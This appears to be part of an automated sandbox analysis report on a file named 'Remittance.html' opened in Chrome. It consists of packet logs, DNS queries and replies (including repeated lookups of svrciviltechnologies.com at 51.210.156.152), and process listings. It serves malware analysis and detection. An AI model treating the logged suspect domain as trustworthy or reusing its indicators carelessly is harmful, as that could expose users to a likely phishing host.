                                                                    Nov 29, 2022 20:12:33.790599108 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.790900946 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.790926933 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.818737030 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.818859100 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.819951057 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.819993019 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.825476885 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.825545073 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.825654984 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.825920105 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.825944901 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.890141964 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.890667915 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.890723944 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.891841888 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.893455029 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.893491030 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.893672943 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.894561052 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.894587994 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.984378099 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.984550953 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.984699965 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.986706972 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.986767054 CET4434969751.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.986799955 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.986864090 CET49697443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.989290953 CET49698443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.989372015 CET4434969851.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.989511013 CET49698443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.989870071 CET49698443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.989907026 CET4434969851.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:34.053966045 CET4434969851.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:34.058917999 CET49698443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:34.058970928 CET4434969851.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:34.060384035 CET4434969851.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:34.061180115 CET49698443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:34.061218977 CET4434969851.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:34.061427116 CET4434969851.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:34.061430931 CET49698443192.168.2.351.210.156.152
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 29, 2022 20:12:32.976474047 CET5102353192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:12:32.977266073 CET5476353192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:12:32.999924898 CET53547631.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:12:33.000973940 CET53510231.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:12:33.308947086 CET6263853192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:12:33.645998001 CET53626381.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:12:34.381998062 CET6332253192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:12:34.382460117 CET5898553192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:12:34.400212049 CET53633221.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:12:34.400271893 CET53589851.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:12:36.845753908 CET5076653192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:12:36.863856077 CET53507661.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:12:42.473360062 CET5024753192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:12:42.491353035 CET53502471.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:05.908955097 CET5203853192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:05.909578085 CET6494553192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:05.910286903 CET6010253192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:05.927324057 CET53520381.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:05.927372932 CET53649451.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:05.929004908 CET53601021.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:08.067141056 CET6387153192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:08.076219082 CET5150653192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:08.095467091 CET53515061.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:08.114634991 CET53638711.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:36.902061939 CET5617953192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:36.921783924 CET53561791.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:36.925021887 CET6427253192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:36.942826986 CET53642721.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:43.427619934 CET5969353192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:43.427620888 CET5667053192.168.2.31.1.1.1
                                                                    Nov 29, 2022 20:13:43.445946932 CET53596931.1.1.1192.168.2.3
                                                                    Nov 29, 2022 20:13:43.473213911 CET53566701.1.1.1192.168.2.3
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 29, 2022 20:12:32.976474047 CET192.168.2.31.1.1.10x8e3fStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:32.977266073 CET192.168.2.31.1.1.10x5d4cStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:33.308947086 CET192.168.2.31.1.1.10x78d5Standard query (0)svrciviltechnologies.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:34.381998062 CET192.168.2.31.1.1.10x6fadStandard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:34.382460117 CET192.168.2.31.1.1.10xd723Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:36.845753908 CET192.168.2.31.1.1.10xad83Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:42.473360062 CET192.168.2.31.1.1.10x972aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.908955097 CET192.168.2.31.1.1.10xa468Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.909578085 CET192.168.2.31.1.1.10xae3aStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.910286903 CET192.168.2.31.1.1.10xb736Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:08.067141056 CET192.168.2.31.1.1.10xa503Standard query (0)svrciviltechnologies.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:08.076219082 CET192.168.2.31.1.1.10x2915Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:36.902061939 CET192.168.2.31.1.1.10x509dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:36.925021887 CET192.168.2.31.1.1.10xf0c2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:43.427619934 CET192.168.2.31.1.1.10xa852Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:43.427620888 CET192.168.2.31.1.1.10x1408Standard query (0)svrciviltechnologies.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 29, 2022 20:12:32.999924898 CET1.1.1.1192.168.2.30x5d4cNo error (0)accounts.google.com142.250.186.109A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:33.000973940 CET1.1.1.1192.168.2.30x8e3fNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:33.000973940 CET1.1.1.1192.168.2.30x8e3fNo error (0)clients.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:33.645998001 CET1.1.1.1192.168.2.30x78d5No error (0)svrciviltechnologies.com51.210.156.152A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:34.400212049 CET1.1.1.1192.168.2.30x6fadNo error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:34.400212049 CET1.1.1.1192.168.2.30x6fadNo error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:34.400271893 CET1.1.1.1192.168.2.30xd723No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:36.863856077 CET1.1.1.1192.168.2.30xad83No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:12:42.491353035 CET1.1.1.1192.168.2.30x972aNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.927324057 CET1.1.1.1192.168.2.30xa468No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.927324057 CET1.1.1.1192.168.2.30xa468No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.927372932 CET1.1.1.1192.168.2.30xae3aNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.927372932 CET1.1.1.1192.168.2.30xae3aNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.929004908 CET1.1.1.1192.168.2.30xb736No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.929004908 CET1.1.1.1192.168.2.30xb736No error (0)d26p066pn2w0s0.cloudfront.net18.66.30.94A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.929004908 CET1.1.1.1192.168.2.30xb736No error (0)d26p066pn2w0s0.cloudfront.net18.66.30.77A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.929004908 CET1.1.1.1192.168.2.30xb736No error (0)d26p066pn2w0s0.cloudfront.net18.66.30.32A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:05.929004908 CET1.1.1.1192.168.2.30xb736No error (0)d26p066pn2w0s0.cloudfront.net18.66.30.111A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:08.095467091 CET1.1.1.1192.168.2.30x2915No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:08.095467091 CET1.1.1.1192.168.2.30x2915No error (0)d26p066pn2w0s0.cloudfront.net13.224.189.78A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:08.095467091 CET1.1.1.1192.168.2.30x2915No error (0)d26p066pn2w0s0.cloudfront.net13.224.189.9A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:08.095467091 CET1.1.1.1192.168.2.30x2915No error (0)d26p066pn2w0s0.cloudfront.net13.224.189.75A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:08.095467091 CET1.1.1.1192.168.2.30x2915No error (0)d26p066pn2w0s0.cloudfront.net13.224.189.91A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:08.114634991 CET1.1.1.1192.168.2.30xa503No error (0)svrciviltechnologies.com51.210.156.152A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:36.921783924 CET1.1.1.1192.168.2.30x509dNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:36.942826986 CET1.1.1.1192.168.2.30xf0c2No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:43.445946932 CET1.1.1.1192.168.2.30xa852No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:43.445946932 CET1.1.1.1192.168.2.30xa852No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                    Nov 29, 2022 20:13:43.473213911 CET1.1.1.1192.168.2.30x1408No error (0)svrciviltechnologies.com51.210.156.152A (IP address)IN (0x0001)false
                                                                    • accounts.google.com
                                                                    • clients2.google.com
                                                                    • svrciviltechnologies.com
                                                                    • https:
                                                                      • stackpath.bootstrapcdn.com
                                                                      • www.google.com
                                                                      • cdnjs.cloudflare.com
                                                                      • maxcdn.bootstrapcdn.com
                                                                      • logo.clearbit.com

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:20:12:30
                                                                    Start date:29/11/2022
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Remittance.html
                                                                    Imagebase:0x7ff6566b0000
                                                                    File size:2852640 bytes
                                                                    MD5 hash:7BC7B4AEDC055BB02BCB52710132E9E1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Target ID:2
                                                                    Start time:20:12:31
                                                                    Start date:29/11/2022
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1812,i,8274798147493147586,16206874965015421851,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x7ff6566b0000
                                                                    File size:2852640 bytes
                                                                    MD5 hash:7BC7B4AEDC055BB02BCB52710132E9E1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    No disassembly